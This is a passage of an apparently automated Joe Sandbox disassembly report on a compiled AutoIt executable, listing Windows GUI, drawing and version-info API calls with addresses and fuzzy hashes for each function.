                                                                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537AE3
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00537AEE
                                                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537B00
                                                                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00552CAC,00000000), ref: 00537B16
                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00537B26
                                                                                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00537B4C
                                                                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00537B6B
                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537B8D
                                                                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00537D7A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                      • API String ID: 2211948467-2373415609
                                                                                                                      • Opcode ID: 710469d6dc8cb4f1cbd2c63bd0b2c45ab5dacac7900558e6927ce0596ff0460d
                                                                                                                      • Instruction ID: 0030932cbb1ba87c128c4aee26f22f2e59d208aaa6958636d868dabe45a6e6b7
                                                                                                                      • Opcode Fuzzy Hash: 710469d6dc8cb4f1cbd2c63bd0b2c45ab5dacac7900558e6927ce0596ff0460d
                                                                                                                      • Instruction Fuzzy Hash: E1029D79900109EFDB14DFA8DC89EAE7BB9FF49314F008159F905AB2A1DB34AD05DB60
                                                                                                                      APIs
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0054A630
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0054A661
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0054A66D
                                                                                                                      • SetBkColor.GDI32(?,000000FF), ref: 0054A687
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0054A696
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0054A6C1
                                                                                                                      • GetSysColor.USER32(00000010), ref: 0054A6C9
                                                                                                                      • CreateSolidBrush.GDI32(00000000), ref: 0054A6D0
                                                                                                                      • FrameRect.USER32(?,?,00000000), ref: 0054A6DF
                                                                                                                      • DeleteObject.GDI32(00000000), ref: 0054A6E6
                                                                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0054A731
                                                                                                                      • FillRect.USER32(?,?,00000000), ref: 0054A763
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0054A78E
                                                                                                                        • Part of subcall function 0054A8CA: GetSysColor.USER32(00000012), ref: 0054A903
                                                                                                                        • Part of subcall function 0054A8CA: SetTextColor.GDI32(?,?), ref: 0054A907
                                                                                                                        • Part of subcall function 0054A8CA: GetSysColorBrush.USER32(0000000F), ref: 0054A91D
                                                                                                                        • Part of subcall function 0054A8CA: GetSysColor.USER32(0000000F), ref: 0054A928
                                                                                                                        • Part of subcall function 0054A8CA: GetSysColor.USER32(00000011), ref: 0054A945
                                                                                                                        • Part of subcall function 0054A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0054A953
                                                                                                                        • Part of subcall function 0054A8CA: SelectObject.GDI32(?,00000000), ref: 0054A964
                                                                                                                        • Part of subcall function 0054A8CA: SetBkColor.GDI32(?,00000000), ref: 0054A96D
                                                                                                                        • Part of subcall function 0054A8CA: SelectObject.GDI32(?,?), ref: 0054A97A
                                                                                                                        • Part of subcall function 0054A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0054A999
                                                                                                                        • Part of subcall function 0054A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0054A9B0
                                                                                                                        • Part of subcall function 0054A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0054A9C5
                                                                                                                        • Part of subcall function 0054A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0054A9ED
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3521893082-0
                                                                                                                      • Opcode ID: 2d6d617c8e4677ffc2c18970ea7d08140f49f507ebea8a82bfe0cb1db01d642e
                                                                                                                      • Instruction ID: df4cde58f4fd05e02affccf39e06eae3d98d6bd76fbd1b4a9869bc461bf1822e
                                                                                                                      • Opcode Fuzzy Hash: 2d6d617c8e4677ffc2c18970ea7d08140f49f507ebea8a82bfe0cb1db01d642e
                                                                                                                      • Instruction Fuzzy Hash: D0919C76408301EFD7509F68DC08ADB7BB9FF89329F100A29F962961A1D730D848DB52
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(00000000), ref: 005374DE
                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0053759D
                                                                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 005375DB
                                                                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 005375ED
                                                                                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00537633
                                                                                                                      • GetClientRect.USER32(00000000,?), ref: 0053763F
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00537683
                                                                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00537692
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 005376A2
                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 005376A6
                                                                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 005376B6
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005376BF
                                                                                                                      • DeleteDC.GDI32(00000000), ref: 005376C8
                                                                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 005376F4
                                                                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0053770B
                                                                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00537746
                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0053775A
                                                                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0053776B
                                                                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0053779B
                                                                                                                      • GetStockObject.GDI32(00000011), ref: 005377A6
                                                                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 005377B1
                                                                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 005377BB
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                      • API String ID: 2910397461-517079104
                                                                                                                      • Opcode ID: a384c2197ffe7d1d4073c7b3c34bbf2f8fd5762486ea0075a3c6c0382e4b880e
                                                                                                                      • Instruction ID: 935154d6dd49a0f7dec0caa46b06536f090c5d616196995b30050c13f6655063
                                                                                                                      • Opcode Fuzzy Hash: a384c2197ffe7d1d4073c7b3c34bbf2f8fd5762486ea0075a3c6c0382e4b880e
                                                                                                                      • Instruction Fuzzy Hash: C5A1B575A40209BFEB14DBA8DC4AFAE7B79FB19714F004118FA05A72E0DB74AD04DB64
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0052AD1E
                                                                                                                      • GetDriveTypeW.KERNEL32(?,0054FAC0,?,\\.\,0054F910), ref: 0052ADFB
                                                                                                                      • SetErrorMode.KERNEL32(00000000,0054FAC0,?,\\.\,0054F910), ref: 0052AF59
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$DriveType
                                                                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                      • API String ID: 2907320926-4222207086
                                                                                                                      • Opcode ID: de4cd820cf7e2372823b0a5d47f4959d65c80fdb37e6081605f716c321d267c8
                                                                                                                      • Instruction ID: 714e2f15b8205ef7db5cb6bfe3d550037c65e8d1def2edabcc9ad7b8f3cca418
                                                                                                                      • Opcode Fuzzy Hash: de4cd820cf7e2372823b0a5d47f4959d65c80fdb37e6081605f716c321d267c8
                                                                                                                      • Instruction Fuzzy Hash: D551D6B9684215EBCB00DB10FA46DBD7F61FF4A714720845BE40BA72D0EA399D01EB53
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsnicmp
                                                                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                      • API String ID: 1038674560-86951937
                                                                                                                      • Opcode ID: a8ccf53f88b9750aa45a4c5e39614849e7585b59d78fc4fb242cefb3130eccfb
                                                                                                                      • Instruction ID: ef25370bae40fb9cd4c243bd5d080758b74136e6ff62b29c02d6201d8108dd05
                                                                                                                      • Opcode Fuzzy Hash: a8ccf53f88b9750aa45a4c5e39614849e7585b59d78fc4fb242cefb3130eccfb
                                                                                                                      • Instruction Fuzzy Hash: 618119B46002056ACB11AE62DC46FBF3B68AF05706F04802FFD056B192EB79D945C65D
                                                                                                                      APIs
                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00549AD2
                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00549B8B
                                                                                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00549BA7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 2326795674-4108050209
                                                                                                                      • Opcode ID: ad6a4d7c5adfd36c65b6e1a7bbf1720b909df32ec2117a45deb15f698c43273a
                                                                                                                      • Instruction ID: b130c1b5c376355681792dfa3f106e9d9db8842daa0248629471cce94ddcd336
                                                                                                                      • Opcode Fuzzy Hash: ad6a4d7c5adfd36c65b6e1a7bbf1720b909df32ec2117a45deb15f698c43273a
                                                                                                                      • Instruction Fuzzy Hash: 1B02CE70104201AFD725CF24C88ABEBBFE5FF99318F04892DF999962A1C774D858DB52
                                                                                                                      APIs
                                                                                                                      • GetSysColor.USER32(00000012), ref: 0054A903
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 0054A907
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0054A91D
                                                                                                                      • GetSysColor.USER32(0000000F), ref: 0054A928
                                                                                                                      • CreateSolidBrush.GDI32(?), ref: 0054A92D
                                                                                                                      • GetSysColor.USER32(00000011), ref: 0054A945
                                                                                                                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0054A953
                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 0054A964
                                                                                                                      • SetBkColor.GDI32(?,00000000), ref: 0054A96D
                                                                                                                      • SelectObject.GDI32(?,?), ref: 0054A97A
                                                                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0054A999
                                                                                                                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0054A9B0
                                                                                                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0054A9C5
                                                                                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0054A9ED
                                                                                                                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0054AA14
                                                                                                                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0054AA32
                                                                                                                      • DrawFocusRect.USER32(?,?), ref: 0054AA3D
                                                                                                                      • GetSysColor.USER32(00000011), ref: 0054AA4B
                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 0054AA53
                                                                                                                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0054AA67
                                                                                                                      • SelectObject.GDI32(?,0054A5FA), ref: 0054AA7E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0054AA89
                                                                                                                      • SelectObject.GDI32(?,?), ref: 0054AA8F
                                                                                                                      • DeleteObject.GDI32(?), ref: 0054AA94
                                                                                                                      • SetTextColor.GDI32(?,?), ref: 0054AA9A
                                                                                                                      • SetBkColor.GDI32(?,?), ref: 0054AAA4
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1996641542-0
                                                                                                                      • Opcode ID: 59e885a670d10639bfe6cae1582e56f35acc94c590f4ee7fdf78b6a58f1368e2
                                                                                                                      • Instruction ID: a51c1a58a98d54106db3667775f2990c4c2003af49c23887317b12487fb2644f
                                                                                                                      • Opcode Fuzzy Hash: 59e885a670d10639bfe6cae1582e56f35acc94c590f4ee7fdf78b6a58f1368e2
                                                                                                                      • Instruction Fuzzy Hash: 84515975900208EFDB109FA8DC48EEEBBB9FB09324F114625F911AB2A1D7719944EF90
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00548AC1
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00548AD2
                                                                                                                      • CharNextW.USER32(0000014E), ref: 00548B01
                                                                                                                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00548B42
                                                                                                                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00548B58
                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00548B69
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00548B86
                                                                                                                      • SetWindowTextW.USER32(?,0000014E), ref: 00548BD8
• SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00548BEE
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00548C1F
• _memset.LIBCMT ref: 00548C44
• SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00548C8D
• _memset.LIBCMT ref: 00548CEC
• SendMessageW.USER32(?,00001053,000000FF,?), ref: 00548D16
• SendMessageW.USER32(?,00001074,?,00000001), ref: 00548D6E
• SendMessageW.USER32(?,0000133D,?,?), ref: 00548E1B
• InvalidateRect.USER32(?,00000000,00000001), ref: 00548E3D
• GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00548E87
• SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00548EB4
• DrawMenuBar.USER32(?), ref: 00548EC3
• SetWindowTextW.USER32(?,0000014E), ref: 00548EEB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
• String ID: 0
• API String ID: 1073566785-4108050209
• Opcode ID: 11c456bf864705e565acdedcb64e9b62741abb555218f7c41d9874739eea1e91
• Instruction ID: 24154dc1ddc62e5db25cbf3d488cdb636c7e7617731daa0f6f5fe7c0d15b8ab2
• Opcode Fuzzy Hash: 11c456bf864705e565acdedcb64e9b62741abb555218f7c41d9874739eea1e91
• Instruction Fuzzy Hash: 3EE17E74901208AFDB209F55CC84EFE7FB9FF06768F10815AF915AA290DBB49984DF60
APIs
• GetCursorPos.USER32(?), ref: 005449CA
• GetDesktopWindow.USER32 ref: 005449DF
• GetWindowRect.USER32(00000000), ref: 005449E6
• GetWindowLongW.USER32(?,000000F0), ref: 00544A48
• DestroyWindow.USER32(?), ref: 00544A74
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00544A9D
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00544ABB
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00544AE1
• SendMessageW.USER32(?,00000421,?,?), ref: 00544AF6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00544B09
• IsWindowVisible.USER32(?), ref: 00544B29
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00544B44
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00544B58
• GetWindowRect.USER32(?,?), ref: 00544B70
• MonitorFromPoint.USER32(?,?,00000002), ref: 00544B96
• GetMonitorInfoW.USER32(00000000,?), ref: 00544BB0
• CopyRect.USER32(?,?), ref: 00544BC7
• SendMessageW.USER32(?,00000412,00000000), ref: 00544C32
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
• Opcode ID: 44fa77b6a76fe2faec1ec2c7cb22bdc80c7fa17b015e6b04253e13decae10138
• Instruction ID: 9e59e7943958d56c499406b60b493ab110cfc0bdecf903e034bf1ea79497b88e
• Opcode Fuzzy Hash: 44fa77b6a76fe2faec1ec2c7cb22bdc80c7fa17b015e6b04253e13decae10138
• Instruction Fuzzy Hash: 9FB17970644340AFDB44DF69C888BAABBE5FB85308F00891DF9999B2A1DB70EC05CF55
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 005244AC
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 005244D2
• _wcscpy.LIBCMT ref: 00524500
• _wcscmp.LIBCMT ref: 0052450B
• _wcscat.LIBCMT ref: 00524521
• _wcsstr.LIBCMT ref: 0052452C
• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00524548
• _wcscat.LIBCMT ref: 00524591
• _wcscat.LIBCMT ref: 00524598
• _wcsncpy.LIBCMT ref: 005245C3
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 699586101-1459072770
• Opcode ID: caf83856bf7ab779cb9dc5f089f6884e0464ee9cf4644adc1ead963979971f35
• Instruction ID: 22e7e9ef6fc459dc989236c870e69b390844def642420e98dd79a7061091c034
• Opcode Fuzzy Hash: caf83856bf7ab779cb9dc5f089f6884e0464ee9cf4644adc1ead963979971f35
• Instruction Fuzzy Hash: E641F8316402507BDB10AB769C07EBF7BACEF42715F04046FF905A61C2EB78A9019BA9
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004C28BC
• GetSystemMetrics.USER32(00000007), ref: 004C28C4
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004C28EF
• GetSystemMetrics.USER32(00000008), ref: 004C28F7
• GetSystemMetrics.USER32(00000004), ref: 004C291C
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004C2939
• AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 004C2949
• CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004C297C
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004C2990
• GetClientRect.USER32(00000000,000000FF), ref: 004C29AE
• GetStockObject.GDI32(00000011), ref: 004C29CA
• SendMessageW.USER32(00000000,00000030,00000000), ref: 004C29D5
  • Part of subcall function 004C2344: GetCursorPos.USER32(?), ref: 004C2357
  • Part of subcall function 004C2344: ScreenToClient.USER32(005857B0,?), ref: 004C2374
  • Part of subcall function 004C2344: GetAsyncKeyState.USER32(00000001), ref: 004C2399
  • Part of subcall function 004C2344: GetAsyncKeyState.USER32(00000002), ref: 004C23A7
• SetTimer.USER32(00000000,00000000,00000028,004C1256), ref: 004C29FC
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
